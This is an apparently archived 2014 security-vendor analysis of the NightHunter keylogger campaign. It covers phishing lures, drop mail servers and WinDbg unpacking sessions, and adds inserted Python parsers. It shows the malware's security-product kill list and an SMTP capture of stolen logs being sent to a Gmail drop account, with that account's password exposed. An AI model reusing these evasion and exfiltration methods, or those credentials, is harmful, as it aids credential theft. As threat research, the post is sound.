NightHunter: Massive campaign to steal credentials revealed

Posted on July 9, 2014 by McEnroe Navaraj

Cyphort Labs has discovered an extensive data theft campaign that we have named NightHunter. The campaign has been active since 2009 and is designed to steal users' login credentials.

· The campaign is amassing users' login credentials. At this point it does not appear to target specific organizations or industries; we have seen activity across several verticals, including energy, education, insurance and even charities.

· Targeted applications include Google, Yahoo, Facebook, Dropbox and Skype.

· The intent behind the data collection is unknown, but the attackers have many options for leveraging the credentials, and the potential for analyzing and correlating the stolen data to mount highly targeted, damaging attacks is high.

· NightHunter uses SMTP (email) for data exfiltration instead of the more common CnC mechanisms that use web protocols. This may simply be a way to "hide (and steal data) in plain sight" as organizations beef up web anomaly detection to deal with advanced attacks.

To learn more about the campaign, join us on our webinar on Thursday, July 31, 2014 9:00 AM PDT http://info.cyphort.com/mmwjuly

It involves several different keylogger malware families, including Predator Pain, Limitless and Spyrex. The unifying feature is that they all use SMTP (email) for data exfiltration. Email is to social networking what snail mail is to email: outdated and often overlooked, so it can be a stealthier channel for data theft. Hence the name NightHunter.

NightHunter is very aggressive at stealing and sending home the users’ passwords. The actors behind NightHunter can use the trove of stolen credentials to leverage big data analytics and enable new cyber threats, for purposes of extortion, credit card or bank fraud, stealing state secrets or corporate espionage.

Our investigation started with a sample delivered through a phishing email. It is a .Net binary; when executed it steals the user's credentials and sends them to a remote email server. This looks like a naive technique to most existing "advanced" security products. When we looked into the sample, we found additional "similar" samples. We followed the trail and examined the data they exfiltrated to the remote servers.

The NightHunter data theft campaign is believed to have been active since at least 2009, targeting energy firms, educational institutions, hospitals, charities and other enterprises.

Common Delivery Mechanism:

These samples are delivered mostly through phishing emails sent with DOC/ZIP/RAR attachments. A user gets infected by opening a malicious document with scripting enabled. Most of the phishing emails are targeted at personnel in finance/sales/HR departments. Sometimes the actors pose as goods resale agents. We have also seen cases where the malware was bundled with fake IDM/7zip installers. Most of these samples used keylogger tools to sniff data from the victim.


Most common phishing email subject/attachment names:

1. WireSlip
2. Jobs List
3. PO
4. Reconfirm Pls
5. Purchase Order
6. Payment Slip
7. Order
8. Inquiry
9. Remittance Payment Slip

Types of Stolen Credentials:

1. Google
2. Facebook
3. Dropbox
4. Yahoo
5. Hotmail
6. Amazon
7. Skype
8. LinkedIn
9. Banks
10. Rediff

Victim Industries:

1. Oil industry
2. Charities
3. Educational Institutes
4. Hospitals
5. Departmental Stores
6. Auditors
7. Export/Import Companies
8. Insurance Companies
9. TV Network
10. Trading Companies

List of keylogger malware used:

1. Limitless logger lite (http://limitlessproducts.org/)
2. Predator Pain
3. Keylogger Logları (SlloTBan)
4. Spyrex
5. FEDERIKO's Logger
6. Unknown Logger Public
7. Aux Logger
8. Neptune
9. Mr. Clyde Logger
10. Ultimate Logger
11. MY Ultimate Jobe
12. Syslogger
13. Syndicate Logger (http://syndicateproducts.org)

We are seeing the Limitless keylogger in many places. After Limitless Logger, Predator Pain is the most popular among the actors. Given the tool's low cost, easy setup, the quality of its virus generator and the features it supports, we are seeing increasing interest from the actors. Although Limitless Logger has been shut down, it was used heavily.

Most of the keyloggers used provide the following features:

- E-Mail/PHP/FTP upload
- Obfuscation
- Spoof Extension and Change Icon
- Clear Browser Data
- Fake Error Message
- Capture Screenshot
- Disable many programs
- Various spreading mechanisms
- File Downloader
- Block various websites
- Self-delete

Data Stealing:

- Bitcoin Stealing
- Password managers
- Firefox/Google Chrome/IE/Safari/Opera
- Outlook
- Pidgin/Trillian/Paltalk/AIM/IMVU
- Various Games and Game Bots
- Filezilla/Flashfxp/CoreFTP/SmartFTP/FTP Commander

One of the samples (f997f9bdf00d82a42cb0985c803a0ba1ba0c7faf0b69b0d4a1888f6d1f46d210) even printed its activity details to the console.


List of email servers and the number of samples using each:

Email Server                        | Sample Count | First Seen | Last Seen
------------------------------------|--------------|------------|-----------
smtp.googlemail.com/smtp.gmail.com  | 2,500        | 2009       | Today
smtp.mail.ru                        | 228          | 2010-10-08 | 2014-06-13
smtp.live.com                       | 151          | 2010-08-24 | 2014-06-12
mx1.3owl.com                        | 82           | 2012-09-10 | 2014-06-05
smtp.mail.com                       | 42           | 2011-04-20 | 2014-06-12
smtp.yandex.com/smtp.yandex.ru      | 39           | 2010-12-20 | 2014-06-12
smtp.turkceventrilo.com             | 38           | 2014-04-02 | 2014-06-04
smtp.mail.yahoo.com                 | 25           | 2013-02-15 | 2014-06-13
mail.drmike.com.de                  | 31           | 2014-04-06 | 2014-05-29
smtp.aol.com                        | 13           | 2010-10-27 | 2014-06-06
smtp.comcast.net                    | 18           | 2013-05-31 | 2014-06-12
smtp-mail.outlook.com               | 1            | 2014-05-23 |
smtp.list.ru                        | 1            | 2014-06-09 |
smtp.hanco-ltd.biz                  | 10           | 2014-04-04 | 2014-06-10
mail.ieindia.org                    | 7            | 2014-04-29 | 2014-06-10
mail.npcuae.com                     | 1            | 2014-06-08 |
smtp.bilatraders.com                | 1            | 2014-06-04 |
mail.persian-trading.com            | 5            | 2014-05-25 | 2014-06-06
smtp.poczta.onet.pl                 | 2            | 2012-06-02 | 2014-06-09
relay.skynet.be                     | 1            | 2014-06-04 |
Smtp.interia.pl                     | 1            | 2014-06-06 |
mx.freenet.de                       | 1            | 2014-06-05 |
cloud73.dotcanada.com               | 2            | 2014-04-29 | 2014-05-30
smtp.bk.ru                          | 5            | 2014-04-21 | 2014-05-26
master.torguard.tg                  | 3            | 2014-05-16 | 2014-05-23
poczta.o2.pl                        | 4            | 2014-03-21 | 2014-05-31
smtp.web.de                         | 2            | 2011-07-03 | 2014-04-11
mail.snookiezinc.com.de             | 1            | 2014-03-18 |
mail.atbinco.com                    | 2            | 2014-05-09 |
smtps.bol.com.br                    | 2            | 2014-04-15 | 2014-05-26
mail.glintcosmetics.com             | 2            | 2014-04-25 | 2014-06-11

Gmail seems to be the most popular email server used by the criminals to "park" victim data in recent times. The larger number of samples using Gmail is probably due to Gmail's popularity, and because most security products somehow "whitelist" Google/Gmail traffic, making it easy to hide this email in the volume of mail sent to Gmail. Another possible reason is that Gmail imposes many restrictions, such as on how many emails an account can send per day, which forces the actors to keep sending new malware with new accounts.


The number of samples the actors sent for other email servers is very low. We believe some of the servers were hacked to create an email account, and in some cases the actors set up their own email server. For example, the email server of The Institution of Engineers (ieindia.org) was hacked to create two accounts, which were used to park victim data, mostly from India. Some of the samples that used private email servers were active for only a few weeks.

Most of the virus generator tools provide various options to exfiltrate data from the victim machine, such as Email, FTP and PHP upload. Looking at the patterns, most of these actors started with PHP upload and then moved to Email. Analysis of recent malware samples reveals that most of the actors now use only Email. Very few malware samples used multiple methods, such as FTP and Email, to exfiltrate the data.


mx1.3owl.com:

First Seen Date | Infection Count | Keylogger
----------------|-----------------|--------------------------------------------------
6/5/2014        | 2               | Predator Pain
6/4/2014        | 31              | Predator Pain
6/4/2014        | 47              | Predator Pain
6/3/2014        | 10              | Predator Pain
6/3/2014        | 15              | Predator Pain
6/3/2014        | 33              | Predator Pain
6/2/2014        | 2               | Predator Pain
6/2/2014        | 50              | Predator Pain
6/2/2014        | 2               | Predator Pain
6/1/2014        | 33              | Predator Pain
5/30/2014       | 7               | Predator Pain
5/25/2014       | 44              | Predator Pain
5/20/2014       | 6               | Predator Pain
5/17/2014       | 5               | Mr. Clyde Logger and Predator
5/15/2014       | 26              |
5/12/2014       | 5               | Mr. Clyde Logger and Predator
5/11/2014       | 39              | Predator Pain
5/8/2014        | 59              | Predator Pain
5/7/2014        |                 |
5/6/2014        | 6               | Predator Pain
5/2/2014        | 20              | Predator Pain, Limitless Logger
4/24/2014       | 37              | Predator Pain
4/23/2014       | 57              | Predator Pain, Limitless Logger
4/22/2014       | 57              | Predator Pain, Limitless Logger
4/22/2014       | 57              | Predator Pain, Limitless Logger, MY Ultimate Jobe
4/17/2014       | 57              | Predator Pain, Limitless Logger
4/17/2014       | 57              | Predator Pain, Limitless Logger, MY Ultimate Jobe
4/17/2014       | 14              | Predator Pain
4/16/2014       |                 |
4/15/2014       | 1               | Predator Pain
4/10/2014       | 73              | Predator Pain, Limitless Logger
4/9/2014        | 73              | Predator Pain, Limitless Logger
4/9/2014        |                 | Limitless Logger
4/5/2014        | 57              | Predator Pain, Limitless Logger
4/5/2014        |                 | Limitless Logger
4/5/2014        |                 | Predator Pain, Limitless Logger
4/3/2014        | 42              |
3/27/2014       | 73              |
2/18/2014       | 1               | Predator Pain
1/28/2014       | 57              | Predator Pain, Limitless Logger, MY Ultimate Jobe


The actors behind these malware samples (35 out of 82) followed similar techniques when registering domains. The author's identity is hidden from the analyst.


List of samples we looked into that are related to mx1.3owl.com:



mail.ieindia.org:

All the samples related to this email server were active for only a few weeks. They were targeted at people in India. The actors used Limitless Logger to extract information from the victims. Analysts believe the actors hacked into this email server and created two email accounts to park their data. The victims came from different industries.



Manual Analysis

Most of the samples we manually analyzed used a lot of obfuscation techniques to delay analysis. We will look at the static analysis details of this sample (MD5: cfb72c025bc99733a7f0c21242738a57) and other related samples.

Anti-analysis techniques used:

1. Non-printable characters used as class/variable names in the code.
2. Assembly.Load() used to load a different assembly.
3. Strings in the code encoded using various methods (we found almost 10 different methods).
4. Detection code for various security products.
5. Debugger detection code.

We looked into the binary using various .Net disassemblers; most of them did not work on most of the binaries. We analyzed this binary using ILSpy. Internally it decoded another assembly from its resource section and loaded it.


We decided to dump the second stage using WinDbg. Most of the first-stage binaries did not use debugger detection or security product detection code, but the second stage does.

0:000> sxe ld:mscorlib
0:000> sxe ld:mscorjit
0:000> g
0:000> .loadby sos mscorwks
0:000> !bpmd mscorlib.dll System.AppDomain.Load
0:000> g
0:000> !clrstack -a
OS Thread Id: 0xc64 (0)
ESP EIP
0045ed38 67f0736c System.AppDomain.Load(Byte[])
PARAMETERS:
this = 0x02851268
rawAssembly = 0x02879c04
LOCALS:
<no data>
0045ed3c 00341c55 jhgfdertyui.iuytrdfghj.Form1_Load(System.Object, System.EventArgs)
PARAMETERS:
this = <no data>
sender = <no data>
e = <no data>
LOCALS:
<no data>
0x0045ed3c = 0x02879c04
0:000> !da 0x02879c04
Name: System.Byte[]
MethodTable: 67ac37b8
EEClass: 6787eb8c
Size: 32268(0x7e0c) bytes
Array: Rank 1, Number of elements 32256, Type Byte
Element Methodtable: 67ac3868
[0] 02879c0c
...
[32255] 02881a0b
0:000> .writemem c:\tmp\secondstage.bin 02879c0c L0n32255
Writing 7dff bytes................
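Once .writemem has written the byte array passed to AppDomain.Load(Byte[]) to disk, the first thing to check is that the dump really is a managed PE image before handing it to ILSpy. The following is an added example, not code from the original post: it locates the CLR runtime header (data directory 14) in a PE32 or PE32+ header, and exercises the check against a constructed minimal header; clr_header and build_sample are names chosen here.

```python
import struct

def clr_header(blob):
    """Return (rva, size) of the CLR runtime header if blob is a managed PE image, else None."""
    try:
        if blob[:2] != b"MZ":
            return None
        e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
        if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            return None
        opt = e_lfanew + 24   # optional header follows the 4-byte signature and 20-byte COFF header
        magic = struct.unpack_from("<H", blob, opt)[0]
        # PE32 keeps NumberOfRvaAndSizes at +92 and the data directories at +96; PE32+ at +108/+112.
        layout = {0x10B: (92, 96), 0x20B: (108, 112)}.get(magic)
        if layout is None:
            return None
        count_off, dir_off = layout
        if struct.unpack_from("<I", blob, opt + count_off)[0] < 15:
            return None   # directory 14 (CLR runtime header) is not present at all
        rva, size = struct.unpack_from("<II", blob, opt + dir_off + 14 * 8)
        return (rva, size) if rva and size else None
    except struct.error:
        return None       # truncated dump: the headers run past the end of the blob

def build_sample(managed):
    """Constructed minimal PE32 header image (not a real assembly) for exercising clr_header."""
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)  # i386, one section, 0xE0-byte optional header
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                              # NumberOfRvaAndSizes
    if managed:
        struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 0x48)      # CLR runtime header RVA and size
    return dos + b"PE\0\0" + coff + bytes(opt)
```

A dump that fails this check is usually off by the array header (the first element lives 8 bytes past the object address on 32-bit .NET, as the !da output above shows), not a different file format.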

The second-stage binary was again obfuscated. It used a lot of variables with non-printable characters. Since we were not able to set breakpoints in WinDbg, we decided to do dynamic analysis on the binary. This binary tried to persist on the system through an autorun registry modification. It first tried to connect to a remote server (which depends on the binary) to find the external IP address, and then sent an email to the remote server.


It connected to a remote email server (mx1.3owl.com) and sent an email with the victim information. It used the Predator Pain v14 keylogger. We extracted the email credentials from the network traffic.

Let's look at other similar binaries that include the credentials in plain text in the original sample itself.

MD5: 3d7fee36dcd7f1e6bed77d6d9648ada5d899d3efc8dc1d1fd605f75c065cf84d

Email credentials were hidden at the end of file.


Some binaries looked for a few security products installed on the machine. If they found any, they hid their own window and killed the security product.


All of this detection looks for a particular process name:

AntiKeyscrambler() -> keyscrambler
AntiWireshark() -> wireshark
AntiAnubis() -> anubis
AntiMalwarebytes() -> mbam
AntiKaspersky() -> avp
AntiOllydbg() -> ollydbg
AntiOutpost() -> outpost
AntiNorman() -> npfmsg
AntiBitDefender() -> bdagent
AntiNOD32() -> egui

We used WinDbg to dump the credentials for some of the samples that did not do debugger detection.

0:000> sxe ld:mscorlib
0:000> sxe ld:mscorjit
0:000> sxe ld:System.Windows.Forms.dll
0:000> g
ModLoad: 00000000`6f680000 00000000`6fb4e000 System.Windows.Forms.dll
ntdll!ZwMapViewOfSection+0xa:
00000000`77a6153a c3 ret
0:000> .loadby sos mscorwks
0:000> .symfix
0:000> ld system_ni
0:000> !bpmd System.dll System.Net.NetworkCredential..ctor
0:000> !bpmd System.dll System.Net.NetworkCredential..ctor
Found 4 methods...
Setting breakpoint: bp 000007FEEA84F490 [System.Net.NetworkCredential..ctor()]
Setting breakpoint: bp 000007FEEA3D6B10 [System.Net.NetworkCredential..ctor(System.String, System.String)]
Setting breakpoint: bp 000007FEEA84F4A0 [System.Net.NetworkCredential..ctor(System.String, System.String, System.String)]
Setting breakpoint: bp 000007FEEA84F4C0 [System.Net.NetworkCredential..ctor(System.String, System.String, System.String, Boolean)]
0:000> g
Breakpoint 1 hit
System_ni+0x236b10:
000007fe`ea3d6b10 53 push rbx
0:000> !dumpobj -nofields rdx
Name: System.String
MethodTable: 000007feeb007d90
EEClass: 000007feeac0e560
Size: 66(0x42) bytes
(C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)
String: alinsterpu@gmail.com
0:000> !dumpobj -nofields r8
Name: System.String
MethodTable: 000007feeb007d90
EEClass: 000007feeac0e560
Size: 46(0x2e) bytes
(C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll)
String: hainerosii

Most of the binaries used TCP/587 to send emails to the remote server; some binaries associated with mx1.3owl.com used TCP/2525. We retrieved most of the credentials using dynamic analysis, including for Gmail. Gmail uses an encrypted channel to the remote server, and since the number of samples using Gmail was high, we decided to MITM the Gmail traffic in our malware lab.

S->C 53 b'220 mx.google.com ESMTP ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 16 b'EHLO test-PC\r\n'
S->C 137 b'250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-STARTTLS\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n'
C->S 10 b'STARTTLS\r\n'
S->C 30 b'220 2.0.0 Ready to start TLS\r\n'
Wrapping sockets.
C->S 16 b'EHLO test-PC\r\n'
S->C 178 b'250-mx.google.com at your service, [67.188.0.147]\r\n250-SIZE 35882577\r\n250-8BITMIME\r\n250-AUTH LOGIN PLAIN XOAUTH XOAUTH2 PLAIN-CLIENTTOKEN\r\n250-ENHANCEDSTATUSCODES\r\n250 CHUNKING\r\n'
C->S 41 b'AUTH login YWxpbnN0ZXJwdUBnbWFpbC5jb20=\r\n'
S->C 18 b'334 UGFzc3dvcmQ6\r\n'
C->S 18 b'aGFpbmVyb3NpaQ==\r\n'
S->C 20 b'235 2.7.0 Accepted\r\n'
C->S 34 b'MAIL FROM:<alinsterpu@gmail.com>\r\n'
S->C 42 b'250 2.1.0 OK ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 32 b'RCPT TO:<alinsterpu@gmail.com>\r\n'
S->C 42 b'250 2.1.5 OK ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 6 b'DATA\r\n'
S->C 43 b'354 Go ahead ec2sm20231912pbc.63 - gsmtp\r\n'
C->S 228 b'MIME-Version: 1.0\r\nFrom: alinsterpu@gmail.com\r\nTo: alinsterpu@gmail.com\r\nDate: 17 Jun 2014 01:25:48 +0530\r\nSubject: New keylogger logs!\r\nContent-Type: text/plain; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\n'
C->S 48 b'keylogger started at: 6/17/2014 1:24:43 AM=0D=0A'
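As an added example (not code from the original post), here is a small parser for captures in this C->S/S->C format: it replays the AUTH LOGIN exchange and the DATA phase, so the account the logs are parked in, its password, the recipient and the message headers fall out of one pass. The embedded capture is constructed with placeholder account details; parse_capture and SAMPLE_CAPTURE are names chosen here.

```python
import ast, base64, re

# One capture line: direction, byte count, then the payload as a Python bytes literal.
LINE = re.compile(r"^(C->S|S->C) (\d+) (b'.*')$")

def _lines(payload):
    parts = payload.split(b"\r\n")   # a trailing CRLF leaves an empty tail: drop it
    return parts[:-1] if payload.endswith(b"\r\n") else parts

def parse_capture(text):
    """Replay a C->S/S->C capture: recover the AUTH LOGIN credentials, recipient and message."""
    s = {"username": None, "password": None, "rcpt_to": [], "headers": {}, "body": []}
    expecting = None   # which AUTH LOGIN prompt the next client line answers: "user" or "pass"
    phase = None       # "headers", then "body", once the client has issued DATA
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue   # e.g. the proxy's own "Wrapping sockets." marker
        direction, payload = m.group(1), ast.literal_eval(m.group(3))
        for line in _lines(payload):
            if direction == "S->C":
                if line.startswith(b"334 "):   # server prompt: base64 "Username:" or "Password:"
                    prompt = base64.b64decode(line[4:]).decode().lower()
                    expecting = "pass" if prompt.startswith("password") else "user"
            elif phase == "headers":   # headers run until the first blank line
                if line == b"":
                    phase = "body"
                elif b":" in line:
                    k, v = line.split(b":", 1)
                    s["headers"][k.decode()] = v.strip().decode()
            elif phase == "body":   # body runs until the lone "." terminator
                phase = None if line == b"." else "body"
                if phase:
                    s["body"].append(line.decode(errors="replace"))
            elif line.upper().startswith(b"AUTH LOGIN"):
                parts = line.split()
                if len(parts) > 2:   # initial-response form: username travels with the command
                    s["username"] = base64.b64decode(parts[2]).decode()
                expecting = "pass" if len(parts) > 2 else "user"
            elif expecting:   # client's answer to the 334 prompt
                s["username" if expecting == "user" else "password"] = base64.b64decode(line).decode()
                expecting = None
            elif line.upper().startswith(b"RCPT TO:"):
                s["rcpt_to"].append(line[8:].strip(b"<> ").decode())
            elif line.upper() == b"DATA":
                phase = "headers"
    return s

# Constructed capture in the same format as the lab session above, with placeholder account details.
SAMPLE_CAPTURE = r"""
C->S 41 b'AUTH login bG9nc0BleGFtcGxlLmludmFsaWQ=\r\n'
S->C 18 b'334 UGFzc3dvcmQ6\r\n'
C->S 18 b'cGxhY2Vob2xkZXI=\r\n'
S->C 20 b'235 2.7.0 Accepted\r\n'
C->S 32 b'RCPT TO:<logs@example.invalid>\r\n'
C->S 6 b'DATA\r\n'
C->S 60 b'From: logs@example.invalid\r\nSubject: New keylogger logs!\r\n\r\n'
C->S 48 b'keylogger started at: 1/1/2014 12:00:00 AM=0D=0A'
C->S 3 b'.\r\n'
"""
```

The recovered recipient is the drop account to report to the mail provider and to search for in your own outbound SMTP logs.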

One of the samples we analyzed (MD5: 8962ca1997193be3931c41983cc4600e941d40bdb0fdddafa00f3761feeb4ba8) used both Email and FTP to exfiltrate data from the user's machine.


Most of the samples used code-level obfuscation to delay analysis. In the end we identified 10 different methods (decoding/decryption) used to decode various strings, which is no surprise given that these samples were created with similar virus generator tools.

NightHunter is one of the more unique campaigns we have researched at Cyphort, due to its footprint and the complex data collection models it exhibits. Furthermore, its use of low-signal evasion, such as webmail for data exfiltration, points to a much larger end goal. This reflects the shifting "tradecraft" being adopted by actors who leverage big data models to mine more interesting and strategically suitable data, whether for direct, targeted attacks or to provide highly actionable content to other actors for economic benefit.